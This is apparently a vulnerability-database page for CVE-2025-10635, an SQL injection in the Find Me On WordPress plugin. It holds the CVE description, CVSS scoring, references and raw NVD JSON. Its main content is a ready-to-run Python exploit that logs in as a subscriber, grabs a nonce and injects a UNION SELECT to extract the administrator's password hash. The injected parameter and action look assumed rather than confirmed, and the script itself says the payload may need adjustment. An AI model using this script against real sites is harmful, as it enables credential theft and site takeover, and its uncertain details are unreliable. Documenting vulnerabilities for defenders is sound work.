CVE-2025-10635

Description

The Find Me On WordPress plugin through 2.0.9.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers and above to perform SQL injection attacks

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Find Me On插件 <= 2.0.9.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10635 - Find Me On WordPress Plugin SQL Injection PoC
# Affected: Find Me On plugin <= 2.0.9.1
# Requires: Subscriber-level WordPress account

import requests
import re

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Step 1: Login as subscriber to get session cookies
session = requests.Session()
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Obtain nonce from the vulnerable page (Find Me On settings)
settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=find-me-on"
response = session.get(settings_url)
nonce_match = re.search(r'_wpnonce=([a-f0-9]+)', response.text)
nonce = nonce_match.group(1) if nonce_match else ""

# Step 3: Exploit SQL Injection via the unsanitized parameter
# The vulnerable parameter is injected into a SQL statement without sanitization
inject_url = f"{TARGET_URL}/wp-admin/admin.php?page=find-me-on"
sql_payload = "1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -"

params = {
    "id": sql_payload,
    "_wpnonce": nonce,
    "action": "delete"
}

response = session.get(inject_url, params=params)
print("[*] Response status:", response.status_code)
print("[*] Extracted admin hash from response:")
# Parse the response to extract the leaked password hash
hash_match = re.search(r'\$P\$[A-Za-z0-9./]{31}', response.text)
if hash_match:
    print(f"[+] Admin Password Hash: {hash_match.group(0)}")
else:
    print("[-] No hash found, payload may need adjustment")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10635
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10635
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10635/
[4] VulDB https://vuldb.com/cve/CVE-2025-10635
[5] https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/
[6] https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10635", "sourceIdentifier": "[email protected]", "published": "2025-10-08T06:15:33.527", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Find Me On WordPress plugin through 2.0.9.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers and above to perform SQL injection attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "references": [{"url": "https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}